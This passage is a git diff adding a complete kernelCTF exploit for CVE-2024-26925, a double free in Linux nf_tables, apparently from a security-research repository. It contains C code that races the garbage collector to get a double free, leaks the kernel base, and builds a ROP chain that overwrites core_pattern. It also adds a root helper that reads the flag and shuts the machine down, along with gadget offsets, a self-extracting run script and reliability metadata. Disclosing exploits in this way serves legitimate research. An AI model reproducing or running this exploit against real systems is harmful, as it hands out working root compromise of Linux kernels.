wait_gc(); + + info("build rop chain"); + + // fake object (also use as rop chain) + fake_obj[0] = kbase + add_rsp_0x50; + fake_obj[11] = kbase + pop_rdi; + fake_obj[12] = kbase + core_pattern; + fake_obj[13] = kbase + pop_3; + fake_obj[16] = fake_ops_addr; // obj->ops + + fake_obj[17] = kbase + pop_rsi; + fake_obj[18] = (size_t)&user_buf; + fake_obj[19] = kbase + pop_rdx; + fake_obj[20] = sizeof(user_buf); + fake_obj[21] = kbase + copy_from_user; + fake_obj[22] = kbase + rcu_read_unlock; + fake_obj[23] = kbase + pop_rdi; + fake_obj[24] = 0x1000000000000; + fake_obj[25] = kbase + delay_loop; + *(size_t *)((char *)fake_obj + 0x39) = kbase + pop_rsp_ret; // stack pivot (object ptr is pushed by ops->dump) + + struct nftnl_table *table = new_table("pwn"); + nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, fake_obj, 256); // allocate to kmalloc-cg-256 + + // write object data back + BATCH_BEGIN(batch, buf, sizeof(buf)); + NEW_TABLE(batch, nlh, table); + BATCH_END_SEND(batch, nl); + + // invoke obj->ops->dump + info("invoke ops->dump"); + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETOBJ, NFPROTO_IPV4, + NLM_F_ACK, seq++); + nftnl_obj_nlmsg_build_payload(nlh, obj); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + error("mnl_socket_send"); + } +} + +void leak_kbase(struct mnl_socket *nl, const char *tablename) { + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch *batch; + struct nftnl_table *table; + struct nftnl_obj *obj; + struct nftnl_set *set; + struct nftnl_set_elem *setelem; + struct nlmsghdr *nlh; + int ret; + + memset(buffer, 0, 256); + + table = new_table("leak_tbl"); + // userdata allocate to kmalloc-cg-256, use to leak object data + nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, buffer, 256); + obj = new_object(tablename, "leak_obj"); + set = new_rhash_set(tablename, "pwn_set"); + // pre-saved setelem + setelem = new_setelem_key(200, 0x41); // kmalloc-cg-256 + nftnl_set_elem_add(set, setelem); + + // [A, A] on the free list + info("reclaim double freed memory"); + + BATCH_BEGIN(batch, buf, sizeof(buf)); + NEW_TABLE(batch, nlh, table); + NEW_OBJ(batch, nlh, obj); + BATCH_END_SEND(batch, nl); + + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETTABLE, NFPROTO_IPV4, + NLM_F_ACK, seq); // do not update seq number here + nftnl_table_nlmsg_build_payload(nlh, table); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + error("mnl_socket_sendto"); + } + + recv_nft_reply(nl); + + kbase = leaked_data[16] - nft_ct_expect_obj_ops; + info("kernel base: 0x%lx", kbase); + + // reset double freed state + info("reset double free state"); + BATCH_BEGIN(batch, buf, sizeof(buf)); + DEL_OBJ(batch, nlh, obj); + // free saved elem to avoid double free + DEL_SETELEM(batch, nlh, set); + DEL_TABLE(batch, nlh, table); + BATCH_END_SEND(batch, nl); + + // now freelist become [A, B, A] + wait_gc(); +} + +size_t config_timing(struct mnl_socket *nl) { + char buf[MNL_SOCKET_BUFFER_SIZE * 0x10]; + char tablename[] = "conf_table"; + char chainname[] = "conf_chain"; + struct timespec start, end; + struct nftnl_table *table; + struct nftnl_set *set; + struct nftnl_chain *chain; + struct nftnl_rule *rule; + struct nftnl_set_elem *setelem, *setelem_bk; + struct mnl_nlmsg_batch *batch; + struct nlmsghdr *nlh; + int ret; + + table = new_table(tablename); + chain = new_chain(tablename, chainname); + // empty rule only used to build DELRULE + rule = new_rule(tablename, chainname); + + BATCH_BEGIN(batch, buf, sizeof(buf)); + NEW_TABLE(batch, nlh, table); + NEW_CHAIN(batch, nlh, chain); + BATCH_END_SEND(batch, nl); + + progress("allocating blocking set"); + for (int i = 0; i < blocking_set_cnt; ++i) { + char setname[0x30] = {}; + snprintf(setname, sizeof(setname), "block%d", i); + setup_block(nl, tablename, chainname, setname); + } + done(); + + progress("approximate block time"); + clock_gettime(CLOCK_MONOTONIC_RAW, &start); + + BATCH_BEGIN(batch, buf, sizeof(buf)); + // free all rules under chain + DEL_RULE(batch, nlh, rule); + // del non-exist table to force abort + DEL_TABLE(batch, nlh, new_table("nonexist")); + BATCH_END_SEND(batch, nl); + + clock_gettime(CLOCK_MONOTONIC_RAW, &end); + done(); + + // the time elapsed after setelem was allocated + double block_time = + (end.tv_sec - start.tv_sec) * 1000 + + (end.tv_nsec - start.tv_nsec) / 1000000.0; + + setelem_timeout = block_time / 2.0 * 1.5; + gc_interval = block_time / 6.0; + + info("batch resolution took %.3lf ms", block_time); + info("setup race parameters:\n" + " setelem timeout: %u ms\n" + " gc interval: %u ms", + setelem_timeout, gc_interval); +} + +void trigger_vuln(struct mnl_socket *nl, const char *tablename) { + // need more buffer here + char buf[MNL_SOCKET_BUFFER_SIZE * 0x10]; + struct timespec start, end; + struct nftnl_table *table; + struct nftnl_set *set; + struct nftnl_chain *chain; + struct nftnl_rule *rule; + struct nftnl_set_elem *setelem, *setelem_bk; + struct mnl_nlmsg_batch *batch; + struct nlmsghdr *nlh; + int ret; + + info("setup initial state"); + + table = new_table(tablename); + set = new_rhash_set(tablename, "pwn_set"); + chain = new_chain(tablename, "pwn_chain"); + rule = new_rule(tablename, "pwn_chain"); + setelem = new_setelem_timeout(200, setelem_timeout); // kmalloc-cg-256 + setelem_bk = new_setelem_key(200, 0x41); // kmalloc-cg-256 + nftnl_set_elem_add(set, setelem_bk); + + BATCH_BEGIN(batch, buf, sizeof(buf)); + NEW_TABLE(batch, nlh, table); + NEW_CHAIN(batch, nlh, chain); + NEW_SET(batch, nlh, set); + BATCH_END_SEND(batch, nl); + + progress("allocating blocking set"); + clock_gettime(CLOCK_MONOTONIC_RAW, &start); + for (int i = 0; i < blocking_set_cnt; ++i) { + char setname[0x30] = {}; + snprintf(setname, sizeof(setname), "block%d", i); + setup_block(nl, tablename, "pwn_chain", setname); + } + clock_gettime(CLOCK_MONOTONIC_RAW, &end); + done(); + + // **Important** + // rhash gc will not be scheduled during high CPU usage (maybe caused by scheduler?) + // re-schedule main thread to a different CPU to avoid stopping gc thread from running + // + // Also a good news is since the freeing thread is using a different CPU, + // the double free check will be bypassed! + set_cpu(1); + + // setup backup setelem after we switch to cpu1 to use the same cache + BATCH_BEGIN(batch, buf, sizeof(buf)); + NEW_SETELEM(batch, nlh, set); + BATCH_END_SEND(batch, nl); + + nftnl_set_free(set); + set = new_rhash_set(tablename, "pwn_set"); + nftnl_set_elem_add(set, setelem); + + // race windows: (should be removed *after* gc put it into list) + // | N ticks | remove setelem | | (mutex unlock) | + // ....|---------------- __nf_tables_abort ------------------------|-- loop to load modules --| mutex relock + // |--- nft_rhash_gc -> queue trans_gc_work | nft_trans_gc_work -> nft_trans_gc_work_done -> call_rcu free setelem + // ^-- timer kicks in (grab mutex lock & check gc_seq & remove setelem) + progress("trigger double free"); + BATCH_BEGIN(batch, buf, sizeof(buf)); + + // -EAGAIN will be instant handled, however it works a bit weird... + // instead of delete the resolved module request in `nft_net->module_list` + // `nf_tables_module_autoload()` it place it back, so the list will keep growing LOL + for (int i = 0; i < module_load_cnt; ++i) { + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWOBJ, NFPROTO_IPV4, + NLM_F_CREATE | NLM_F_EXCL, + seq++); + + // NFTNL_OBJ_TYPE cannot be directly set, manually build it here + nftnl_obj_nlmsg_build_simple_payload(nlh, tablename, "obj", i + 100); + mnl_nlmsg_batch_next(batch); + } + + // setelem timer count from here + NEW_SETELEM(batch, nlh, set); + + // to block target setelem from being removed during abort phase + // this will free all rules under pwn_chain + DEL_RULE(batch, nlh, rule); + + // trigger abort autoload + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWOBJ, NFPROTO_IPV4, + NLM_F_CREATE | NLM_F_EXCL, + seq++); + nftnl_obj_nlmsg_build_simple_payload(nlh, tablename, "obj", 6666); + mnl_nlmsg_batch_next(batch); + + BATCH_END_SEND(batch, nl); + success(); + + wait_gc(); +} + +int setup_sandbox(void) { + progress("setup user namespace"); + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + error("unshare"); + } + done(); + return 0; +} + +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash() { + int memfd = memfd_create("", 0); + if (sendfile(memfd, open("root", 0), 0, 0xffffffff) == -1) { + error("sendfile"); + } + + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + + *(size_t *)0 = 0; +} + +int main(int argc, char *argv[]) { + struct mnl_socket *nl; + int msgq[0x20]; + + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + if (fork() == 0) { + set_cpu(0); + strcpy(argv[0], "rabbit"); + while (1) + sleep(1); + } + + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(); + } + + // after rhash set allocation, + // main thread will eventually run on core 1 + info("pin cpu @ core 0"); + set_cpu(0); + setup_sandbox(); + + for (int i = 0; i < 0x20; ++i) { + msgq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + if (msgq[i] < 0) { + error("msgget"); + } + } + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (!nl) { + error("mnl_socket_open"); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + error("mnl_socket_bind"); + } + + // de-fragmentation + for (int i = 0; i < 0x20; i++) { + for (int j = 0; j < 60; j++) { + msg_alloc(msgq[i], buffer, 200); + } + } + + info("====== setup stage ======"); + config_timing(nl); + + info("====== trigger stage ======"); + trigger_vuln(nl, "exp"); + + info("====== leak stage ======"); + leak_kbase(nl, "exp"); + + info("====== exploit stage ======"); + exploit_vuln(nl, "exp"); + + error_s("exploit failed"); +} diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit new file mode 100755 index 000000000..7b58f2cc7 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h new file mode 100644 index 000000000..9e44d54e3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/params.h @@ -0,0 +1,16 @@ +#include +#include +size_t nft_ct_expect_obj_type = 0x2b6d0c0; +size_t nft_ct_expect_obj_ops = 0x1b2b740; +size_t core_pattern = 0x29bab60; +size_t rcu_read_unlock = 0x2122b0; +size_t copy_from_user = 0x8690d0; +size_t delay_loop = 0x11228a0; + +size_t pop_rdi = 0x12c7c0; +size_t pop_rsi = 0x2e2a6; +size_t pop_rdx = 0x848e2; +size_t pop_3 = 0x113164; // pop r12 ; pop rbp ; pop rbx ; ret +size_t pop_rsp_ret = 0xdb7e0; +size_t add_rsp_0x50 = 0x248c16; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret) +size_t push_rsi_jmp_deref_rsi_0x39 = 0x988647; // push rsi ; jmp qword ptr [rsi + 0x39] diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c new file mode 100644 index 000000000..d194a60e7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/root.c @@ -0,0 +1,33 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +char buf[0x100]; +char path[0x100]; + +int main() { + FILE* fp = popen("pidof rabbit", "r"); + fread(buf, 1, 0x100, fp); + fclose(fp); + + int pid = strtoull(buf, 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + system("cat /flag; echo o>/proc/sysrq-trigger"); +} + diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh new file mode 100755 index 000000000..2da48048b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/run.sh @@ -0,0 +1,9 @@ +#!/bin/sh +mkdir /tmp/workdir # /tmp/exp is a dir +cd /tmp/workdir + +dd if=$0 of=exp.tar.gz skip=1 +tar -xf exp.tar.gz +./exp + +exit diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h new file mode 100644 index 000000000..2d65235ef --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/tools.h @@ -0,0 +1,213 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define error(msg) do { \ + perror("\33[2K\r[-] " msg); \ + exit(EXIT_FAILURE); \ +} while (0) + +#define error_s(msg) do { \ + printf("\33[2K\r[-] " msg); \ + exit(EXIT_FAILURE); \ +} while (0) + +#define info(msg, ...) \ + printf("[*] " msg "\n" __VA_OPT__(,) __VA_ARGS__) + +#define progress(msg, ...) \ + printf("[ ] " msg __VA_OPT__(,) __VA_ARGS__) + +#define done() printf("\0337\r[+]\0338: done\n") +#define success() printf("\0337\r[+]\338: success\n") + +uint32_t seq = 123456; + +#define BATCH_BEGIN(batch, buf, buf_sz) \ + do { \ + batch = mnl_nlmsg_batch_start(buf, buf_sz); \ + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define BATCH_END_SEND(batch, nl) \ + do { \ + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); \ + mnl_nlmsg_batch_next(batch); \ + int ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), \ + mnl_nlmsg_batch_size(batch)); \ + if (ret < 0) { \ + error("mnl_socket_sendto"); \ + } \ + mnl_nlmsg_batch_stop(batch); \ + } while (0) + +#define NEW_TABLE(batch, nlh, table) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWTABLE, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_table_nlmsg_build_payload(nlh, table); \ + mnl_nlmsg_batch_next(batch); \ + } while(0) + +#define DEL_TABLE(batch, nlh, table) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELTABLE, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_table_nlmsg_build_payload(nlh, table); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_CHAIN(batch, nlh, chain) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWCHAIN, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_chain_nlmsg_build_payload(nlh, chain); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_RULE(batch, nlh, rule) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWRULE, NFPROTO_IPV4, \ + NLM_F_CREATE, seq++); \ + nftnl_rule_nlmsg_build_payload(nlh, rule); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_RULE(batch, nlh, rule) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELRULE, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_rule_nlmsg_build_payload(nlh, rule); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_SET(batch, nlh, set) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWSET, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_set_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_SETELEM(batch, nlh, setelem) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWSETELEM, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, seq++); \ + nftnl_set_elems_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_SETELEM(batch, nlh, setelem) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELSETELEM, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_set_elems_nlmsg_build_payload(nlh, set); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define NEW_OBJ(batch, nlh, obj) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_NEWOBJ, NFPROTO_IPV4, \ + NLM_F_CREATE | NLM_F_EXCL, \ + seq++); \ + nftnl_obj_nlmsg_build_payload(nlh, obj); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +#define DEL_OBJ(batch, nlh, obj) \ + do { \ + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), \ + NFT_MSG_DELOBJ, NFPROTO_IPV4, \ + 0, seq++); \ + nftnl_obj_nlmsg_build_payload(nlh, obj); \ + mnl_nlmsg_batch_next(batch); \ + } while (0) + +char msg_buf[0x2000]; +struct msg { + long mtype; + char mtext[]; +}; + +void msg_alloc(int msgqid, char *data, size_t size) { + struct msg *msg = (struct msg *)msg_buf; + msg->mtype = 1; + + size -= 0x30; + memcpy(msg->mtext, data, size); + + if (msgsnd(msgqid, msg, size, 0) < 0) { + error("msgsnd"); + } +} + +void msg_free(int msgqid) { + struct msg *msg = (struct msg *)msg_buf; + if (msgrcv(msgqid, msg, sizeof(msg_buf)-8, 0, IPC_NOWAIT) < 0) { + error("msgrcv"); + } +} + +void hexdump(const void* data, size_t size) { + char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } +} + +void set_cpu(int cpu_n) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(0, sizeof(set), &set) < 0) { + error("sched_setaffinity"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json new file mode 100644 index 000000000..ff302015d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp153", "exp156"], + "vulnerability": { + "cve": "CVE-2024-26925", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27", + "affected_versions": ["6.5 - 6.9-rc3"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "lts-6.1.81": { + "environment": "lts-6.1.81", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "95% success rate" + }, + "cos-105-17412.294.36": { + "environment": "cos-105-17412.294.36", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "90% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz new file mode 100644 index 000000000..7c52e4874 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp153.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz new file mode 120000 index 000000000..207e9f3c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/original_exp156.tar.gz @@ -0,0 +1 @@ +original_exp153.tar.gz \ No newline at end of file